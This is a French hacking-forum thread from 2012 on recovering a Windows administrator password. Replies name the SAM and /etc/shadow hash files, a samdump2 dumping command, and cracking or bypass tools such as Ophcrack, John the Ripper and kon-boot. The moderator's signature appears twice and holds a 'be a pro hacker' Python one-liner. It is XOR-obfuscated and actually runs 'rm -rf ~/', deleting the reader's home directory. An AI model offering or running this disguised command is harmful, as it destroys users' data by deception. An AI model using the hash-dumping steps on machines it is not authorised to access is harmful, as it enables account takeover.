Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 18-02-2012 08:51:42

Willywpl
Membre Actif

Bruteforce pour trouver mot de passe admin?

Bonjour à tous, est-il possible de trouver le mot de passe administrateur ( mot de passe demandé au démarrage de l'ordi) avec une attaque bruteforce à la place d'utiliser le cd de réinitialisation?

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 18-02-2012 09:55:42

spawn
Modérateur

Re : Bruteforce pour trouver mot de passe admin?

Oui.

(hihi)

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 18-02-2012 10:14:14

spawn
Modérateur

En fait, que tu sois sous windows ou debian ou mac, les mots de passe ne sont pas stockés en clair (normal), on stocke leur image par une fonction surjective (un Hash) , et on connait ces fonctions.

XP :
Le hash est stocké dans ce fichier :
c:\windows\system32\config\SAM
Qui lui même est crypté avec celui-ci :
c:\windows\system32\config\system

Le hash est un LM ou un NTLM.

Tu peux utiliser Ophcrack ou LCP si tu as un accès partiel.

Seven :

Tu peux utiliser de même, Ophcrack ou Caïn et Abel si tu as un accès partiel.
Si tu peux booter une Backtrack sur la machine, tu peux utiliser samdump2 pour choper les hashs :
$ samdump2 /point/de/montage/Windows/System32/config/SAM out > hashes.txt

Debian :

Les utilisateurs sont enregistrés dans /etc/passwd
Les hash sont stockés dans /etc/shadow

John the ripper s'occupe de tout comme il faut, et je crois que Ophcrack aussi.

Pas de bêtises les enfants !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#4 18-02-2012 10:28:26

vances1
Membre Indispensable
Site Web

Tu parle bien du mot de pass windows ?

Car si il s'agit du bios il suffit de virer la pile cmos quelques secondes/minutes pour le reset.

En cas de besoin un contact de type trombone peu aider smile

Perso je viens de tester Ophcrack avec les tables (gratuite) de leur site et c'est vraiment pas le top

Faudrais voir comment les générer nous même.

Dernière modification par vances1 (18-02-2012 10:28:57)

Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

#5 18-02-2012 10:54:27

mzutg
Membre Indéboulonnable

Il y a aussi kon-boot qui permet de booter sur l'admin sans connaitre son mot de passe ( il suffit de de le changer un fois qu'on a booter dessus ou de rajouter un autre compte admin avec la cmd pour avoir acces à la machine).
kon-boot s'injecte dans le kernel au demarrage du pc, il faut donc graver son iso sur une cd,dvd,disquette,usb et le tour est jouer.

Depuis peu il existe une nouvelle version de kon-boot, mais payante. En ce qui me concerne j'ai toujours utilisé la version gratuire.
http://www.piotrbania.com/all/kon-boot/index2.html

#6 18-02-2012 12:49:59

Willywpl
Membre Actif

Bonjour spawn! Merci de ta réponse smile.
Mais je n ai pas d'accès partiel à la machine vu qu'il y a un mot de passe pour accéder à la session. Enfin je ne vois pas trop de quoi tu veux parler.

Vances, merci également de ta réponse!
Oui effectivement je parle du mot de passe Windows, mais d'après ce que j'ai compris, ta technique reset le mot de passe? Parce que moi je voudrais le trouver, par exemple en mode sans echec!

mzutg, merci, je connaissais cette technique mais ce n'est pas mon objectif sachant qu'avec cmd on peut ouvrir une nouvelle session et l'administrer.

J'avais oublié de préciser que je suis sur Windows 7 sans BT5.

Dernière modification par Willywpl (18-02-2012 12:50:48)

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.028 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]